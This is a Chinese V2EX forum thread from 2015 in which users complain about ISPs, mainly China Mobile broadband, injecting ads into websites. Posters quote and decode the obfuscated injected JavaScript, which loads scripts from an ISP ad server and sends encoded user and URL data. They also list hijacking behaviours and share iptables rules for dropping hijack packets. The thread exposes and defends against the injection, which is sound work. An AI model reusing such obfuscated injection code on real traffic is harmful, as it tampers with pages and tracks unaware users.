V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
yetsky
V2EX  ›  DNS

移动宽带访问 51credit,百度等网站居然添加广告

  •  
  •   yetsky · 2015-02-24 15:03:29 +08:00 · 5537 次点击
    这是一个创建于 3593 天前的主题,其中的信息可能已经有所发展或是发生改变。
    代码如下,居然还是加密的。

    <script>var d="=iunm?=ifbe?=mjol!sfm>#tuzmftiffu#!uzqf>#ufyu0dtt#!isfg>#iuuq;00322/249/318/33:;6873903/dtt#?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00322/249/318/33:;687390d/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00322/249/318/33:;6873903/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?wbs!q>#iuuq;00322/249/318/33:;687390b0t@beje>311615'uddb>NUN5NUNxPUB3PUV>'vsjq>279327:544'tqpsu>";function i(_,__){_+=__;var $="";for(var u=0;u<_.length;u++){var r=_.charCodeAt(u);$+=String.fromCharCode(r-1);}return $;} var c="1'fqpsu>1'psmv>bIS1dEpwM3Kjdz52NXOz[XSqeD6kc31w[n:zeX1uN{huNT6peH2t'tqje>2783743675'bsfb>2:7'ut>2535869883'bpsmv>bIS1dEpwM{JyNT5yN{hvNkB4MkJzPUp2O{ZzPD9zNEB2NERw'q2bsn>463'q3bsn>611'q4bsn>21'q5bsn>6'q6bsn>4'q7bsn>2'bqqe>1'ibtDpvou>1'ibtXijufVtfs>1#<=0tdsjqu?=0ifbe?=cpez!je>#c#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op!pompbe>#joju)q*#!pocfgpsfvompbe>#ttu)*#?=0cpez?=0iunm?";document.write(i(d,c));</script>
    17 条回复    2015-02-25 23:17:03 +08:00
    yetsky
        1
    yetsky  
    OP
       2015-02-24 15:17:59 +08:00
    解密后
    <html><head><link rel="stylesheet" type="text/css" href="http://211.138.207.229:57628/2.css"><script type="text/javascript" src="http://211.138.207.229:57628/c.js"></script><script type="text/javascript" src="http://211.138.207.229:57628/2.js"></script><script type="text/javascript">var p="http://211.138.207.229:57628/a/s?adid=200504&tcca=MTM4MTMwOTA2OTU=&urip=1682169433&sport=0&eport=0&orlu=aHR0cDovL2Jicy41MWNyZWRpdC5jb20vZm9ydW0tMzgtMS5odG1s&spid=1672632564&area=196&ts=1424758772&aorlu=aHR0cDovLzIxMS4xMzguMjA3LjIyOTo1NzYyOC8yMDA1MDQv&p1arm=352&p2arm=500&p3arm=10&p4arm=5&p5arm=3&p6arm=1&appd=0&hasCount=0&hasWhiteUser=0";</script></head><body id="b" rightMargin=0 topMargin=0 leftMargin=0 scroll=no onload="init(p)" onbeforeunload="sst()"></body></html>
    arachide
        2
    arachide  
       2015-02-24 15:26:30 +08:00
    正常
    百度 360 金山 搜狗
    是中国4大垃圾软件厂商

    慎用

    偶是不用 大把更好性能的工具 何必去找虐
    wdlth
        3
    wdlth  
       2015-02-24 15:29:47 +08:00
    连电信都加,移动铁通还用说?
    tdifg
        4
    tdifg  
       2015-02-24 15:33:35 +08:00
    哎,你是没用过长城宽带
    arachide
        5
    arachide  
       2015-02-24 15:35:19 +08:00
    你去网吧试试bing
    保准到百度

    哈哈
    isnowify
        6
    isnowify  
       2015-02-24 15:40:56 +08:00 via iPhone
    电信访问什么都加,手机端加完广告后整个页面都变得如此细长,惨不忍睹。。。
    另外
    @Livid should move to http://v2ex.com/go/bb
    貌似v2ex支持回复翻页了?
    zsx
        7
    zsx  
       2015-02-24 16:00:22 +08:00   ❤️ 1
    福州铁通,行为包括:
    1. 概率:相当大;劫持百度统计的统计js,行为包括:点击带百度统计的网站的任何位置都会被跳转到某页游网站、右下角弹窗其中之一;
    2. 概率:100%;在PCQQ好友面板的 [动态] 和手机QQ空间触屏版投放右下角广告;
    3. 概率:100%;把114DNS和Google DNS劫持到自己的DNS;
    4. 概率:看心情;百度首页,强制加推广链接并清空Cookies(嗯强制退出百度账号哦)。曾经导致百度搜索无法翻页,点击第二页等强制跳转到第一页。
    5. 概率:每日首次访问100%,剩下看心情;淘宝、京东等,跳转到自己的返利链接;
    6. 概率:看心情;随机跳转到别的网站(比如打开zhihu.com跳到了电影站)。

    另外百度首页的跳转证据还很难抓,我自己用cURL的时候就正常,还要大改HTTP头完全模拟浏览器才能抓得到……而且不定时……我要抓的时候就消失了……
    nvidiaAMD980X
        8
    nvidiaAMD980X  
       2015-02-24 16:57:12 +08:00 via Android
    百度和Bing的页面也不整洁,Bing搜索框莫名其妙地下拉新闻给你,百度就是个广告流氓~~~最喜欢Google了,但每次搜索都要挂V---P----N。
    Silicon
        9
    Silicon  
       2015-02-24 17:25:38 +08:00   ❤️ 1
    以下几条 辽宁铁通保平安
    请根据自己情况修改
    iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m ttl --ttl-eq 124 -j LOG --log-prefix "Caught bad ttl of hijack: "
    iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m ttl --ttl-eq 124 -m comment --comment "Bad ttl of hijack" -j DROP
    iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0xce56" -j LOG --log-prefix "Caught bad window of hijack"
    iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0xce56" -m comment --comment "Bad window of hijack" -j DROP
    iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0x800" -j LOG --log-prefix "Caught bad window of hijack"
    iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0x800" -m comment --comment "Bad window of hijack" -j DROP
    kiritoalex
        10
    kiritoalex  
       2015-02-24 21:18:42 +08:00 via iPhone
    @Silicon 赞一个
    s3040608090
        11
    s3040608090  
       2015-02-24 23:22:28 +08:00 via Android
    我也是用移动宽带,之前手机连wifi上一些网站(比如v2ex)经常上下两条广告,用dnscrypt解决。
    Halry
        12
    Halry  
       2015-02-25 08:52:27 +08:00
    没用过长城?什么http网页都给你加
    groot
        13
    groot  
       2015-02-25 08:54:36 +08:00
    @arachide 同意,我反正是抵制百毒,360很多年了,都是些没节操的公司
    mackyzhan
        14
    mackyzhan  
       2015-02-25 09:17:53 +08:00
    希望HTTPS赶快普及起来,中国公司哪有节操可言。
    moxiaotiao
        15
    moxiaotiao  
       2015-02-25 12:12:47 +08:00
    @zsx 笑死我了
    nn574204775
        16
    nn574204775  
       2015-02-25 17:58:32 +08:00 via Android
    就在用移动 没出现上面说的情况 0.0 只是改了默认DNS
    shippo7
        17
    shippo7  
       2015-02-25 23:17:03 +08:00
    @Livid 一楼代码Chrome下超出边界
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1475 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 17:10 · PVG 01:10 · LAX 09:10 · JFK 12:10
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.